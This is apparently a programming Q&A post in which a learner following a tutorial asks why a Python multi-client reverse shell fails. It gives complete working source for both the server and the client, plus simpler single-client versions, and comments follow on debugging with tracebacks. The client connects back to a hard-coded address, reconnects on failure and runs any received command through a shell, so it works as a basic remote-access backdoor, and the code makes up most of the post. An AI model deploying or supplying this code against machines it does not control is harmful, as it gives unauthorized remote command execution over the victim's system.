# Python -Multi client reverse shell with threads error

Tags: python

I am following thenewboston tutorial, I think I did pretty much the same like he did, line by line, but my reverse shell is not working, I am trying to run it locally. I am running MultiServer.py and then MultiClient.py but I get an error. I'll explain it in a second but first, here is my code:

**MultiServer.py:**

```
import socket
import time
from queue import Queue
import threading

# One thread to listen and create sockets, second thread to connect and send commands
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_addresses = []


#  Create socket (allows two computers to connect)
def socket_create():
    try:
        global host
        global port
        global s
        host = ''  # the server doesn't need to know the ip, only the client
        port = 9992
        s = socket.socket()
    except socket.error as msg:
        print('Socket creation error', str(msg))


# Bind socket to port and wait for connection from client
def socket_bind():
    try:
        global port
        global s
        print('Binding socket to port: ' + str(port))
        s.bind((host, port))
        s.listen(5)
    except socket.error as msg:
        print('Socket binding error', str(msg) + '\n' + 'Retrying...')
        time.sleep(5)
        socket_bind()


# Accept connections from multiple clients and save to list - Thread 1
def accept_connections():
    for c in all_connections:
        c.close()
    del all_connections[:]  # delete items from list
    del all_addresses[:]
    while 1:
        try:
            conn, address = s.accept()
            conn.setblocking(1)  # no timeout
            all_connections.append(conn)
            all_addresses.append(address)
            print("\nConnection has been established: " + address[0] + ":" + address[1])
        except:
            print("Error accepting connections")


# Interactive prompt for sending commands remotely
def start_connection():
    while 1:
        cmd = input('> ')
        if cmd == 'list':
            list_connections()
        elif 'select' in cmd:
            conn = get_target(cmd)
            if conn is not None:
                send_target_commands(conn)
        else:
            print('Command not recognized')


# Displays all current connections
def list_connections():
    results = ''
    for i, conn in enumerate(all_connections):  # enumerate - counter
        try:
            conn.send(str.encode(' '))  # check if the connection is valid by sending empty message
            conn.recv(20480)
        except:
            del all_connections[i]
            del all_addresses[i]
            continue
        results += 'Connection ' + str(i) + '   ' + str(all_addresses[i][0]) + ':' + str(all_addresses[i][1]) + '\n'
    print('----- Clients -----' + '\n' + results)


#  Selecting a target client
def get_target(cmd):
    try:
        target = cmd.replace('select ', '')
        target = int(target)
        conn = all_connections[target]
        print('You are now connected to:', str(all_addresses[target][0]))
        print(str(all_addresses[target][0]) + '> ', end='')
        return conn
    except:
        print('Not a valid selection')
        return None


# Connect with remote target client
def send_target_commands(conn):
    while True:
        try:
            cmd = input()
            if len(str.encode(cmd)) > 0:
                conn.send(str.encode(cmd))
                client_response = str(conn.recv(20480), 'utf-8')
                print(client_response, end='')
            if cmd == 'quit':
                break
        except:
            print('Connection lost')
            break


# Create the threads
def create_threads():
    for _ in range(NUMBER_OF_THREADS):
        t = threading.Thread(target=work)
        t.daemon = True  # the thread will die when main program exit
        t.start()


# Each list item is a new job
def create_jobs():
    for x in JOB_NUMBER:
        queue.put(x)
    queue.join()  # the queue is like a to-do list, we added 1 and 2 to the queue


# Do the next job in the queue (one handles connections, the other sends commands)
def work():
    while True:
        x = queue.get()  # will be equal to 1 and then will be 2
        if x == 1:
            socket_create()
            socket_bind()
            accept_connections()
        if x == 2:
            start_connection()
        queue.task_done()


create_threads()
create_jobs()
```

**MultiClient.py**

```
import os
import socket
import subprocess
import time


#  Create a socket
def socket_create():
    try:
        global host
        global port
        global s
        host = '192.168.1.33'
        port = 9992
        s = socket.socket()
    except socket.error as msg:
        print('Socket creation error:', str(msg))


# Connect to a remote socket
def socket_connect():
    try:
        global host
        global port
        global s
        s.connect((host, port))
    except socket.error as msg:
        print('Socket connection error:', str(msg))
        time.sleep(5)
        socket_connect()


# Receive commands from remote server and run on local machine
def receive_commands():
    while True:
        data = s.recv(20480)
        if data[:2].decode('utf-8') == 'cd':
            try:
                os.chdir(data[3:].decode('utf-8'))
            except:
                pass
        if data[:].deocde('utf-8') == 'quit':
            s.close()
            break
        if len(data) > 0:
            try:
                cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)  # run command in terminal
                output_bytes = cmd.stdout.read() + cmd.stderr.read()
                output_str = str(output_bytes, 'utf-8')
                s.send(str.encode(output_str + str(os.getcwd()) + '> '))
                print(output_str)
            except:
                output_str = 'Command not recognized' + '\n'
                s.send(str.encode(output_str + str(os.getcwd()) + '> '))
                print(output_str)
    s.close()


def main():
    global s
    try:
        socket_create()
        socket_connect()
        receive_commands()
    except:
        print('Error in main')
        time.sleep(5)
    s.close()
    main()


main()
```

So, in the tutorial we first created a simple reverse shell that can contain only one client, and it was working for me fine. if needed, here is the code:

**Client.py:**

```
import os
import socket
import subprocess

s = socket.socket()
host = '127.0.0.1'
port = 9997
s.connect((host, port))

while True:
    data = s.recv(1024)
    if data[:2].decode('utf-8') == 'cd':
        os.chdir(data[3:].decode('utf-8'))
    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)  # run command in terminal
        output_bytes = cmd.stdout.read() + cmd.stderr.read()
        output_str = str(output_bytes, 'utf-8')
        s.send(str.encode(output_str + str(os.getcwd()) + '> '))
        print(output_str)

# close connection
s.close()
```

**Server.py:**

```
import socket
import sys


#  Create socket (allows two computers to connect)
def socket_create():
    try:
        global host
        global port
        global s
        host = ''  # the server doesn't need to know the ip, only the client
        port = 9997
        s = socket.socket()
    except socket.error as msg:
        print('Socket creation error', str(msg))


# Bind socket to port and wait for connection from client
def socket_bind():
    try:
        global host
        global port
        global s
        print('Binding socket to port: ' + str(port))
        s.bind((host, port))
        s.listen(5)
    except socket.error as msg:
        print('Socket binding error', str(msg) + '\n' + 'Retrying...')
        socket_bind()


# Establish a connection with client (socket must be listening for them)
def socket_accept():
    conn, address = s.accept()
    print('Connection has been established | ' + 'IP ' + address[0] + ' | Port ' + str(address[1]))
    send_commands(conn)
    conn.close()


#  Send commands
def send_commands(conn):
    while True:
        cmd = input('')
        if cmd == 'quit':
            conn.close()
            s.close()
            sys.exit()
        if len(str.encode(cmd)) > 0:  # system commands are bytes and not strings
            conn.send(str.encode(cmd))
            client_response = str(conn.recv(1024), 'utf-8')
            print(client_response, end='')


def main():
    socket_create()
    socket_bind()
    socket_accept()


main()
```

As I understood it can be a problem with the firewall so the code may be fine, but a check from an other computer will be great for me. Also, I haven't specified the error I receive, when running MultiServer.py and the MultiClient.py I get the message:

```
C:\Python34\python.exe C:/Users/dodob/PycharmProjects/ReverseShell/MultiClient/MultiServer.py
> Binding socket to port: 9992
Error accepting connections
```

I am currently trying this on windows, I also have Linux and I haven't tried to run this there. I tried to disable 'windows firewall with advanced security' but no help.

Comment: It looks like you are not setting `SO_REUSEADDR` when you create your server sockets. However, to verify that this is the problem, we need the traceback from the exceptions. If you insist on catching them, at least import `traceback` and call `print traceback.format_exc()` after you print your messages. Add that output to your question.

Comment: @DavidCullen well that wasn't the problem but printing the traceback helped me identify the problem, thank you..

Comment: In which case, it would be a good idea to post your own answer...